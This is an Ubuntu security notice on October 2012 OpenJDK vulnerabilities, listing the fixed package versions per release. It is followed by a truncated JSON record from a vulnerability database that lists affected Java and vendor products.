Several security issues were fixed in OpenJDK. An attacker could exploit these to cause a denial of service. These issues only affected Ubuntu 12.10. (CVE-2012-5067, CVE-2012-5070)
Vulnerabilities were discovered in the OpenJDK JRE related to data integrity. (CVE-2012-5073, CVE-2012-5079)
A vulnerability was discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit these to cause a denial of service. These issues only affected Ubuntu 12.10. (CVE-2012-5081)
Please see the following for more information: http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.10: icedtea-7-jre-cacao 7u9-2.3.3-0ubuntu1~12.10.1 icedtea-7-jre-jamvm 7u9-2.3.3-0ubuntu1~12.10.1 openjdk-7-jre 7u9-2.3.3-0ubuntu1~12.10.1 openjdk-7-jre-headless 7u9-2.3.3-0ubuntu1~12.10.1 openjdk-7-jre-lib 7u9-2.3.3-0ubuntu1~12.10.1 openjdk-7-jre-zero 7u9-2.3.3-0ubuntu1~12.10.1
Ubuntu 12.04 LTS: icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~12.04.1 icedtea-6-jre-jamvm 6b24-1.11.5-0ubuntu1~12.04.1 openjdk-6-jre 6b24-1.11.5-0ubuntu1~12.04.1 openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~12.04.1 openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~12.04.1 openjdk-6-jre-zero 6b24-1.11.5-0ubuntu1~12.04.1
Ubuntu 11.10: icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~11.10.1 icedtea-6-jre-jamvm 6b24-1.11.5-0ubuntu1~11.10.1 openjdk-6-jre 6b24-1.11.5-0ubuntu1~11.10.1 openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~11.10.1 openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~11.10.1 openjdk-6-jre-zero 6b24-1.11.5-0ubuntu1~11.10.1
Ubuntu 11.04: icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~11.04.1 icedtea-6-jre-jamvm 6b24-1.11.5-0ubuntu1~11.04.1 openjdk-6-jre 6b24-1.11.5-0ubuntu1~11.04.1 openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~11.04.1 openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~11.04.1 openjdk-6-jre-zero 6b24-1.11.5-0ubuntu1~11.04.1
Ubuntu 10.04 LTS: icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~10.04.2 openjdk-6-jre 6b24-1.11.5-0ubuntu1~10.04.2 openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~10.04.2 openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~10.04.2 openjdk-6-jre-zero 6b24-1.11.5-0ubuntu1~10.04.2
This update uses a new upstream release, which includes additional bug fixes
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201210-0280", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "sun", "version": "1.4.2_36" }, { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "sun", "version": "1.4.2_35" }, { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "sun", "version": "1.4.2_33" }, { "model": "jdk", "scope": "eq", "trust": 1.6, "vendor": "sun", "version": "1.4.2_18" }, { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "sun", "version": "1.4.2_32" }, { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "sun", "version": "1.4.2_37" }, { "model": "jdk", "scope": "eq", "trust": 1.6, "vendor": "sun", "version": "1.4.2_17" }, { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "sun", "version": "1.4.2_34" }, { "model": "jdk", "scope": "eq", "trust": 1.6, "vendor": "sun", "version": "1.6.0.210" }, { "model": "jdk", "scope": "eq", "trust": 1.6, "vendor": "sun", "version": "1.4.2_19" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_27" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_6" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_28" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_32" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_12" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_22" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_21" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_3" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_30" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_20" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_7" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_24" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_37" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_5" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_23" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_15" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_31" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_6" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_28" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_16" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_4" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_25" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_1" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0.200" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_10" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_31" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_2" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_23" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_27" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_12" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_14" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_9" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_33" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.4.2_38" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_4" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_11" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_35" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_1" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_13" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.4.2_38" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_15" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_10" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_8" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_16" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_29" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_19" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_25" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_36" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_2" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_14" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_9" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_11" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_26" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_34" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_22" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_13" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_17" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_3" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_30" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_8" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_7" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_29" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_5" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_26" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_18" }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "sdk 08", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "sdk 24", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 08", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "sdk 1.4.2 22", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "sdk 1.4.2 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 22", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.4.2 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 24", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 09", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "sdk 1.4.2 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.4.2 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.4.2 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "sdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "sdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.4.2 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "sdk 09", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.4.2 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.4.2 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "sdk 1.4.2 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "sdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "sdk 1.4.2 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "sdk 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "citrix", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "erlang", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "f5", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "legion of the bouncy castle", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "matrixssl", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "micro focus", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "wolfssl", "version": null }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "jdk .0 03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.5.0.0 07", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 22", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "icedtea", "scope": "ne", "trust": 0.3, "vendor": "icedtea", "version": "1.10.10" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli storage manager administration center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "icedtea", "scope": "ne", "trust": 0.3, "vendor": "icedtea", "version": "1.11.5" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "network satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.5" }, { "model": "trio tview software", "scope": "eq", "trust": 0.3, "vendor": "schneider electric", "version": "3.27.0" }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "icedtea", "scope": "ne", "trust": 0.3, "vendor": "icedtea", "version": "2.3.3" }, { "model": "trio tview software", "scope": "ne", "trust": 0.3, "vendor": "schneider electric", "version": "3.29.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "sdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.4.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli federated identity manager business gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "labs qradar siem mr2", "scope": "ne", "trust": 0.3, "vendor": "q1", "version": "7.1" }, { "model": "network satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.5" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "db2 performance expert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "openjdk", "scope": "eq", "trust": 0.3, "vendor": "openjdk", "version": "7" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.5" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "tivoli netcool/omnibus web gui", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "4.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0" }, { "model": "rational performance tester", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.1" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "optim performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.9" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "icedtea", "scope": "ne", "trust": 0.3, "vendor": "icedtea", "version": "2.1.3" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "vcenter server update", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "5.11" }, { "model": "infosphere master data management server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "jdk and jre for openvms integrity servers", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.0-4" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "db2 performance expert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational requirements composer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "icedtea", "scope": "eq", "trust": 0.3, "vendor": "icedtea", "version": "2.2.2" }, { "model": "tivoli storage manager administration center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7" }, { "model": "openjdk", "scope": "eq", "trust": 0.3, "vendor": "openjdk", "version": "6" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "tivoli directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational policy 